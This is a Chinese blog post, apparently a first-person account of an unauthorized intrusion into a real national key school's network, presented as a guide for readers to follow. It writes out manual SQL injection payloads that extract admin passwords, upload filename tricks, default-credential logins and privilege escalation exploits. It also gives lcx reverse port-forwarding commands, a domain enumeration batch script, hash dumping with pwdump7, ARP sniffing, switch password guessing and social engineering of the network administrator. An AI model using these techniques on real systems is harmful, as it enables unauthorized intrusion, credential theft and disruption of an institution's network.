友谊的“招呼”

友谊的“招呼”
我记得在校的时候某校的领导以及老师来到我们学校参观，虽然我见到对方学校的领导我会非常有礼貌的打招呼，一次回到家里的时候，出于友谊，决定为此国家重点级的学校进行友情的“招呼”！
国家级重点级，相对震精的学校，最近我在看《黑客与画家》，里面第一篇的内容是“为什么书呆子不受欢迎”，有段作者是说公立的学校的老师就像监狱里的狱卒，除了防止你打架做坏事之外，都不会管你！我就得说得非常好！作为国家级重点级的学校，这也是更加的！好了，不说题外话了，这篇文章是以前“招呼”的了！所以现在写下来，给大家参考下，虽然不是很好，但是各位也不要喷我吧！
作为国家级的重点学校，我听说他的服务器是ZF给的，买了200W左右，当然我也参观过，虽然外表看不出来，我想那个网管老师也不会吹牛B吧，就是这样才出于好奇心，才弄得！
为了防止被万人骑，所以部分过滤了！
手握神器，开始动工！这次的“招呼”任务我会在win下进行，当然如果需要的情况下，我会使用win+linux交互渗透！
0x01
踩点。

作为一个国家级的重点学校，我相信安全也是非常好的！起码也是服务器独立域名，内网等吧！收集下信息，我会采用某社工神器这个软件我非常喜欢，
说下他的用途吧，适用大型渗透适用，有各种信息的收集，不懂E文的朋
友，可能会比较亏哦！这个工具其实已经融入了bt5系列了，呵呵，说下现在收集到的情况吧。

Win03+iis6.0+内网+C段一个站，无CDN，asp+php+aspx，C段的站是asp+aspx+win03+iis6.0+内网！招聘站一个，三台服务器的管理都是同一人，说下怎么收集的吧！首先google语法。

Site:url inurl:asp|php|aspx|jsp。

还有根据报错等清楚是iis，我就比
较懒，火狐插件直接获得
对两台服务器进行了扫描端口与分析工作，在win下，我会选择用superscan，如果在linux下我会选择更为精准的nmap！superscan比较简单，因为在gui，直接填入IP和所需的端口就行了，如果在linux 下的nmap格式就是：namp –v –a url 。

得到的端口有：
21 ftp
80 www
面对以上者两个端口，可以参考的攻击思路如下：
21---爆破模式，或者社工，嗅探等。

80---iis写权限，以及脚本渗透。

有些人问，不是有php和aspx吗？！应该会扫描到1433和3306的啊！很简单，以为他不允许对外访问，或者内网，他就扫描不出了啊。

扫描了整站目录以及文件，有二级目录上的站。

暂时没发现主站的后台，另一个分站是教师系统，我见过那些老师是在上面进行公告浏览以及发布什么规定的地方。

根据网站上留下来的QQ以及姓名的某个字社工得到网站
管理的部分资料常用密码怎么知道的？！很
简单，拿出你的裤，以及密码社工，马上得到！非常好！得到管理信息对之后非常有用！社工我最爱技术之一！踩点差不多了！进行下一步工作吧！
0x02
战争的开始！
对于以上的信息，为我们的战争的做好了充分的准备，对于初期的脚本初探，对于大站我会选择安全评估工具，例如：国产的jsky，国外的wvs等，这两个大家都是非常常用，对于我来说，一般我都只用些简单的工具就行了，没什么必要都很少用。

主站的是asp，因为找不到后台原因，而且还有二级目录上的站，多数都站都会疏忽二级目录上的站的安全，所以我偷笑了！
经过google收集了下，非常多，而且我听说我那边的朋友说，他们学校以前给某师兄来过，所以安全应该会加固了很多！比较懒，老规矩，都是由软件去跑。

呵呵！结果下来了
后台地址显示500貌似是坏了啊！如果不是坏了，就是不显示吧！反正后台页面显示正常！来检测下吧，是asp搭建的系统，找个带参数的地方测试下注射漏洞吧！
搞注射我觉得手工比工具快，所以所以就手工来了！
/XXX/XXX/onews.asp?id=101’/*出错
/XXX/XXX/onews.asp?id=101 and 1=1 /*正常
/XXX/XXX/onews.asp?id=101 and 1=2 /*出错
/XXX/XXX/onews.asp?id=101 order by 10 /*正常
/XXX/XXX/onews.asp?id=101 order by 12 /*出错
/XXX/XXX/onews.asp?id=101 order by 11 /*正常
/XXX/XXX/onews.asp?id=101union select 1,2,3,4,5,6,7,8,9,10,11 from admin /*显示错位，这里如果不行的就换过另外一种方法一个一个字母来猜，或者换过一个表，我比较懒，所以直接联合查询了！
/XXX/XXX/onews.asp?id=101union select 1,password,username,4,5,6,7,8,9,10,11 from admin /*貌似出错了，这里有个技巧，因为有后台，看后台源码，一些程序猿写网站系统的时候会把字段写在后台页面哪里，
/XXX/XXX/onews.asp?id=101union select 1,password,admin,4,5,6,7,8,9,10,11 from admin
震精了下，居然明文，未经过任何加密！登录后台直接拿shell去了！
居然出错了！我记得还有个上传页面哦！
根据经验这个是雷池的上传，是以get形式提交的！可以构造上传名字
uploadpic.asp?actiontype=mod&picname=miao.asp
这样，然后再浏览器里回车一下，然后上传直接改名字为miao.asp，经过多方测试，貌似改名字了，但是都是显示404，开始以为杀软非常强大，把我的所以免杀马儿都干掉了，然后改下构造页面uploadpic.asp?actiontype=mod&picname=miao.txt ，上传后得到的名字是miao.txt，这个应该不是被杀了吧！上传后发现还是404，就觉得不对劲了，可能是上传坏了或者目录不能写了！换过其他地方来X吧。

他是很多这些二三级目录的系统，都是同一种，都是去除了权限。

于是就转战了招聘站。

0x03
希望被破灭！
一般来说招聘网是分为企业者和招聘者。

一般都有上传头像或者企业图片的地方，我很开心，说不定能直接getshell，但是当我注册了账号进去后，貌似不好突破呢，上传都是非常严格，在经过明小子和bs改包上传都不行，这个站貌似是万企捐献的，简单来说是万企建的站，之前不是说万企有个通杀的漏洞吗，发现这里是没有的，经过一番围观，貌似看见就业论坛
的字眼耶，一看是dvbbs8.3的搭建的论坛，有sql注入，不过还是先测试下默认账号密码，admin，admin888，bingo，正在登陆
这个也下了，虽然有几个管理，因为留着社工管理，还是留着用。

在后台拿shell 添加php就行了，在论坛上传的时候貌似404，要不被杀了，要不不可写，但是上传图片时候能显示，还有就是网上说的添加ashx，但是我是没成功过的，可能我比较倒霉````。

当然本地搭建的起码成功了，我爱本地搭建的，但是不是他论坛上的shell···好吧，来添加看看，上传成功，根据代码，在根目录生成一个一句话后门，名为XX.asp，但是访问都是404，你妹的添加，又是没成功，我爱他，但是他还是不爱我的。

现在基本失去希望了，只有返回招聘网主目录看看吧，测试着搜寻型注入
等注入地方，貌似都是过滤了，看到下载中心，会不会有下载漏洞呢？！下载文件，还有登录的用户啊，真麻烦！
看到什么了吗！？我相信聪明的朋友已经看出什么了，至于他有没有做好防范呢？！这不得
而知，需要实践下才能确认，貌似没有过滤耶，这时心情才好了点，根据信息，进入了后台，进去没多久就出来了- -·居然里面非常严格，什么利用信息也没找到！
0x04
一线希望！
经过十多分钟在教师登录系统的猜测，一个也没登上，起码我蛋疼了，于是我看到了
看见开发公司了吧！至于你看不看得见，反正我看见了！于是萌发了两个方案，其中一个是社工方案，一个源码分析，于是在搜索引擎的帮助下，终于失败告终，这套系统是由此公司开发，需要1k多来购买，网上还没找到开放的源码，我晕，我再晕，我一直晕！好吧，由于第二方案比较YD，所以暂时不会用，不过说下简单思路，有个工具是伪造邮件的吧！我们可以根据伪造发给管理员，说系统升级，需要怎么怎么，你懂的！
于是先聊会天，等下整理完再来！扯扯淡，聊聊妹纸！
好了，继续工作吧！
突然在google里翻呀翻，居然在主站里找到了一个XX级目录上的站，非常好！是dedecms，我们看最近爆出许许多多漏洞，我们来YYDD吧，上了杀器，貌似都返回原点了，测试那个xss的，注册用户，填好XSS getshell的信息，发送，等待管理员来认领，一天过去了，没事发生，貌似还没审核啊，于是直接加管理QQ，直接叫他来审核！过了一会上站里看看，貌似没有事情发生啊，文章虽然审核了！直接找后台，利用收集了的信息进行社工！/XXX/XXX/XXX/dede貌似没有信息返回啊，怎么404，NND，继续来射吧射吧，
好吧好吧，好YD的后台，但是还是阻止不了我们前进的脚步，这次没有走远，没有默认的密码，根据手头信息，一个密码一个密码地测试吧，貌似不行，继续构造，最终以“admin jie3287shy”进入后台，后台拿shell，直接写，没有过滤，也不做解释了！在菜刀里看，我擦，居然主站没后台！你妹啊！
到webshell里看，全盘权限，ws支持，支持aspx，php，3389开着！然后就是看补丁情况，最后能直接上去一步搞到，先来一套提权方案吧！
Ws支持，试试提权exp
Mysql root权限，udf提权
sa权限，直接KO
第三方暂时没其他了。

开始在c盘放上工具，但是一直运行不了，开始以为权限问题，经过一番验证确实是，后来转到e盘，马上搞定了！udf当时测试是被删，服务器是瑞星的，没免杀，sa被降权了！最
后以ms011-80搞定。

然后就不连上去了，之前lcx直接反弹搞定！其他的提权都免了，好快啊！
0x05
嗅探之，结束也！
上去就想马上搞下那个什么系统来，于是嗅探了一回，彻底失望，什么也没有，上班时间，应该会流动很快才对啊，于是我就把发包率调大，还是一样，我不爱他了，cain你妹的！于是根据经验，应该安装了arp防火墙，很简单，直接不停地给网关发就行了。

直接down 幻境网盾，这个很好用，你基友我一直在用，我也给我的基友们一起用，我推荐大家一起用（这个貌似是成龙拍霸王的广告···），不到一回，马上来了，是吧！很好用，直接抄个账号直接登录，发现只是发邮件的功能和浏览一些管理的公告，一直没嗅探到管理账号，所以在上面找啊找，看下利用的地方，一想，发邮件应该会有上传附件的地方吧，好吧，我YD的手按了发邮件，果断有，虽然限制了2M，但是我的几十K就够了，没过滤，完成任务，但是还是ms011-80搞定，因为方便么！直接在嗅探的机器里连接，不知道为啥手YD了，按了5下shiift，居然弹cmd窗口了，上去直接把后门删除，完毕。

0x06
最终目的。

好了，现在开始对内网进行X了，当然这也是最终的目的，内网非常大，分为二层三层交换机，经过收集很多网段，当然我的最终目的不是将他的内网全部挂马，而是拿到路由权限，然后完成对某位朋友的约定！
因为我的机器不是外网，也省得反弹，所以直接骑上肉鸡！主机上用lcx反弹，当然如果你觉得其他好用可以尝试下其他反弹工具，我只是随手拿起来能用就行了，在主机运行上：lcx –listen 51 2008 。

webshell上运行：lcx.exe -slave XXX.XXX.XXX.XXX 51 192.168.8.210 3389 ，然后在主机打开远程输入：127.0.0.1:2008 。

有数据回显，表示反弹成功，
好了，连上后，我并不会去理他的配置，这个留在最后看也不会迟，首先，我会大致理解下他的拓扑结构，因为我参观过网管室，所以大概知道下情况！反正他就是至少会在三层交换机之中。

核心交换机--------三层--------二层--------路由等
现在我的目的是搞定交换机，让教室能正常上网就行了。

三个域，收集情况我会用批处理去完成这项工作
@echo off
setlocal ENABLEDELAYEDEXPANSION
@FOR /F "usebackq delims=, " %%J IN (`net view /domain ^|find "命令執行成功" /v ^|find "The command completed successfully." /v ^|find "命令成功完成" /v ^|find "--" /v ^|find "Domain" /v ^|find "" /v ^|find "コマンドは正常に終了しました" /v /i`) do (
@echo =====domain:%%J========
@FOR /F "usebackq eol=; delims=, " %%i in (`net view /domain:%%J ^|findstr "\\"`) DO (
@FOR /F "usebackq eol=; tokens=1,2,3* delims=\\" %%a in (`echo %%i`) do (
@FOR /F "tokens=1,2,3,4* usebackq delims=: " %%K IN (`@ping -a -n 1 -w 100 %%a ^|findstr "Pinging"`) do (
@echo \\%%L %%M
)
)
)
)
echo %0
好了，收集差不多就动工，首先这台服务器是从80端口突破的，当然还有另一台。

测试下ping其他段的机器，因为是寒假期间，所以我会选择ping交换机，经过朋友的收集情况，每天早上6:50 到中午11:50 会开启
下午14:15 到下午16:55 会开启
晚上18:10 到晚上21:30 会开启
好了,大致也了解到交换机的启动时间资料, 首先不知道本机出于哪个网段,是不是最高毫无妨碍呢?! 非常好, 因为当时我参观的时候网管就是坐在这台服务器上工作的, 朋友说平时老师上课时候要用到连接外网工作,都是由这台服务器去操作的, 所以简单来说这台是能ping通整个校园网络的! 我的现正处于的网段就是：192.168.8.1-255。

如图, 我以我朋友的教室为案例,以及隔壁班的一起：
好了，测试通过，证明这是对的，他的机器是装有瑞星套装，如果到处都ping不通，尝试下关掉防火墙。

当然，我们现在的目的是取得交互机的权限，使得教室网络由不外联到外联。

首先收集下本段的机器有哪些是存活的，当时我在嗅探，所以直接在cain下就能看到！
而且之前我cain的时候不只这些机器，还有其他几台
可能处于某些原因，寒假关闭了。

经过一番嗅探，我获得了同网段下的192.168.8.252 这台服务器，这台是对外开放，所以成功搞下了！有些人问，我的目的只是想弄到交换机的权限，为啥还有搞这么多工作呢？！我告诉你，知己知彼才能百战百胜，因为出于交换机要使用特权模式，而且我暂时没有射到密码，所以必须弄多几台机器，导出系统的hash，再凑合几个密码来。

好了，我们来登录另一台机器看下有啥遗留下来的有用的信息！因为这台就是内网，不用再用肉鸡反弹了！手贱的情况下，还是按了5下shift ，弹出窗口，不解释了，是之前的X 者遗留下来的后门，当时已经添加了用户，别理了。

到时候直接删除就行了！
提权也很简单，拿shell也很简单，不多说了！
上传wce时候，发现不能使用，导出注册表的时候用cain也不能，于是搜索了下还有什么神器能用，pwdump7 ，这个使用非常简单，pwdump7.exe 1>1.txt 意思是把全部hash 导出到文件根目录的1.txt 里面，然后直接到站里破就可以了，如果有彩虹表的直接跑咯，一台跑出了
另一台跑出的是
们都会的。

telnet 192.168.27.1 这个是我朋友的教室网关，也就是交换机了。

成功。

进行输入账号密码阶段。

一般来说我们习惯性都是由简单到复杂来猜测的！
Admin admin 你们懂得！
这是交换机的用户模式。

现在我们要想办法进入特权模式，以备开启教室网络的重要操作。

尝试完这一批之后，失败了，重新组合密码吧，孩纸，我想也没那么简单就让你这垃圾通过的！经过差不多30分钟的猜测，进去了！我的神。

只有目的达到，为求不咋手段、
之后的什么全局配置模式都是浮云了。

目的达到。

之后测试了其他的路由器都是统一密码。

这个两层验证什么的都是傻逼，第一层都是默认，进而获得第二层密码，然而进入特权模式，之后的什么命令都能执行了，重新划分vlan等都可以实现，如果不懂交换机的朋友可以自己找资料看下！突然我发现貌似这只是二层交换机，还有三层和核心交换机，怎么怎么，现在才想到还有这些，因为大半夜，突然那个网管回话了··我擦，神马人啊，于是我就找到朋友，连夜叫醒他收集资料以及拿着手上的裤做对比，于是足足跟那个管理聊了1个半小时多，终于搞定了！看过程：
主要是利用你手头的信息，跟他一直聊天，小心露出破绽，关注他有关工作的信息，他说辞工了，好了，然后我就说我要了解几个交换机的信息，然后诱发他的欲望，而且你要装得很
想学习，然后他就来了，然后就慢慢诱惑他，逼使他说出交换机什么牌子，有助于了解配置命令，然后就是机会来了！看上图，他啥都告诉我了！
0x07
总结。

爱渗透你会更爱社工，爱你妹你会更爱基友！总体来看都是社工后果导致过程过快。

经验经验，你们懂得！之前早弄下，只是没写文章！。